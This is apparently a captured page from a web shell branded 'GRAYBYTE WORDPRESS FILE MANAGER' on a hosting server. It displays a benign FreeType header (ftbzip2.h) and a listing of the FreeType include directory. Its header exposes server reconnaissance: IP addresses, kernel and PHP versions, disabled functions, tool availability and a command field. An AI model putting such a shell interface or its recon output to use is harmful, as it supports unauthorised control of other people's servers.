GRAYBYTE WORDPRESS FILE MANAGER2903

Server IP : 198.54.121.189 / Your IP : 216.73.216.140
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /usr/include/freetype2/freetype/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /usr/include/freetype2/freetype//ftbzip2.h
/***************************************************************************/
/*                                                                         */
/*  ftbzip2.h                                                              */
/*                                                                         */
/*    Bzip2-compressed stream support.                                     */
/*                                                                         */
/*  Copyright 2010-2018 by                                                 */
/*  Joel Klinghed.                                                         */
/*                                                                         */
/*  This file is part of the FreeType project, and may only be used,       */
/*  modified, and distributed under the terms of the FreeType project      */
/*  license, LICENSE.TXT.  By continuing to use, modify, or distribute     */
/*  this file you indicate that you have read the license and              */
/*  understand and accept it fully.                                        */
/*                                                                         */
/***************************************************************************/


#ifndef FTBZIP2_H_
#define FTBZIP2_H_

#include <ft2build.h>
#include FT_FREETYPE_H

#ifdef FREETYPE_H
#error "freetype.h of FreeType 1 has been loaded!"
#error "Please fix the directory search order for header files"
#error "so that freetype.h of FreeType 2 is found first."
#endif


FT_BEGIN_HEADER

  /*************************************************************************/
  /*                                                                       */
  /* <Section>                                                             */
  /*    bzip2                                                              */
  /*                                                                       */
  /* <Title>                                                               */
  /*    BZIP2 Streams                                                      */
  /*                                                                       */
  /* <Abstract>                                                            */
  /*    Using bzip2-compressed font files.                                 */
  /*                                                                       */
  /* <Description>                                                         */
  /*    This section contains the declaration of Bzip2-specific functions. */
  /*                                                                       */
  /*************************************************************************/


 /************************************************************************
  *
  * @function:
  *   FT_Stream_OpenBzip2
  *
  * @description:
  *   Open a new stream to parse bzip2-compressed font files.  This is
  *   mainly used to support the compressed `*.pcf.bz2' fonts that come
  *   with XFree86.
  *
  * @input:
  *   stream ::
  *     The target embedding stream.
  *
  *   source ::
  *     The source stream.
  *
  * @return:
  *   FreeType error code.  0~means success.
  *
  * @note:
  *   The source stream must be opened _before_ calling this function.
  *
  *   Calling the internal function `FT_Stream_Close' on the new stream will
  *   *not* call `FT_Stream_Close' on the source stream.  None of the stream
  *   objects will be released to the heap.
  *
  *   The stream implementation is very basic and resets the decompression
  *   process each time seeking backwards is needed within the stream.
  *
  *   In certain builds of the library, bzip2 compression recognition is
  *   automatically handled when calling @FT_New_Face or @FT_Open_Face.
  *   This means that if no font driver is capable of handling the raw
  *   compressed file, the library will try to open a bzip2 compressed stream
  *   from it and re-open the face with it.
  *
  *   This function may return `FT_Err_Unimplemented_Feature' if your build
  *   of FreeType was not compiled with bzip2 support.
  */
  FT_EXPORT( FT_Error )
  FT_Stream_OpenBzip2( FT_Stream  stream,
                       FT_Stream  source );

  /* */


FT_END_HEADER

#endif /* FTBZIP2_H_ */


/* END */

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
January 01 1970 00:00:00
root / root
0
config
--
April 01 2025 16:48:15
root / root
0755
freetype.h
287.113 KB
May 01 2018 10:34:32
root / root
0644
ftadvanc.h
10.387 KB
April 22 2018 09:41:36
root / root
0644
ftbbox.h
5.111 KB
April 22 2018 09:41:36
root / root
0644
ftbdf.h
6.634 KB
April 22 2018 09:41:36
root / root
0644
ftbitmap.h
14.352 KB
April 22 2018 09:41:36
root / root
0644
ftbzip2.h
4.198 KB
April 22 2018 09:41:36
root / root
0644
ftcache.h
55.253 KB
April 22 2018 09:41:36
root / root
0644
ftchapters.h
9.61 KB
April 22 2018 09:41:36
root / root
0644
ftcid.h
5.518 KB
April 22 2018 09:41:36
root / root
0644
ftdriver.h
46.899 KB
April 22 2018 09:41:36
root / root
0644
fterrdef.h
14.211 KB
April 22 2018 09:41:36
root / root
0644
fterrors.h
11.103 KB
April 22 2018 09:41:36
root / root
0644
ftfntfmt.h
4.859 KB
April 22 2018 09:41:36
root / root
0644
ftgasp.h
4.709 KB
May 01 2018 18:33:46
root / root
0644
ftglyph.h
38.462 KB
April 22 2018 09:41:36
root / root
0644
ftgxval.h
13.076 KB
April 22 2018 09:41:36
root / root
0644
ftgzip.h
5.519 KB
April 22 2018 09:41:36
root / root
0644
ftimage.h
73.898 KB
April 22 2018 09:41:36
root / root
0644
ftincrem.h
10.797 KB
April 22 2018 09:41:36
root / root
0644
ftlcdfil.h
11.851 KB
April 22 2018 09:41:36
root / root
0644
ftlist.h
16.361 KB
April 22 2018 09:41:36
root / root
0644
ftlzw.h
4.148 KB
April 22 2018 09:41:36
root / root
0644
ftmac.h
16.735 KB
April 22 2018 09:41:36
root / root
0644
ftmm.h
40.37 KB
April 22 2018 09:41:36
root / root
0644
ftmodapi.h
37.118 KB
April 22 2018 09:41:36
root / root
0644
ftmoderr.h
10.173 KB
April 22 2018 09:41:36
root / root
0644
ftotval.h
7.411 KB
April 22 2018 09:41:36
root / root
0644
ftoutln.h
34.898 KB
April 22 2018 09:41:36
root / root
0644
ftparams.h
6.165 KB
April 22 2018 09:41:36
root / root
0644
ftpfr.h
6.131 KB
April 22 2018 09:41:36
root / root
0644
ftrender.h
11.055 KB
April 22 2018 09:41:36
root / root
0644
ftsizes.h
9.328 KB
April 22 2018 09:41:36
root / root
0644
ftsnames.h
15.361 KB
April 22 2018 09:41:36
root / root
0644
ftstroke.h
21.771 KB
April 22 2018 09:41:36
root / root
0644
ftsynth.h
4.026 KB
April 22 2018 09:41:36
root / root
0644
ftsystem.h
10.307 KB
April 22 2018 09:41:36
root / root
0644
fttrigon.h
8.227 KB
April 22 2018 09:41:36
root / root
0644
fttypes.h
34.847 KB
April 22 2018 09:41:36
root / root
0644
ftwinfnt.h
10.158 KB
April 22 2018 09:41:36
root / root
0644
t1tables.h
34.695 KB
April 22 2018 09:41:36
root / root
0644
ttnameid.h
58.545 KB
April 22 2018 09:41:36
root / root
0644
tttables.h
44.645 KB
April 22 2018 09:41:36
root / root
0644
tttags.h
5.503 KB
April 22 2018 09:41:36
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF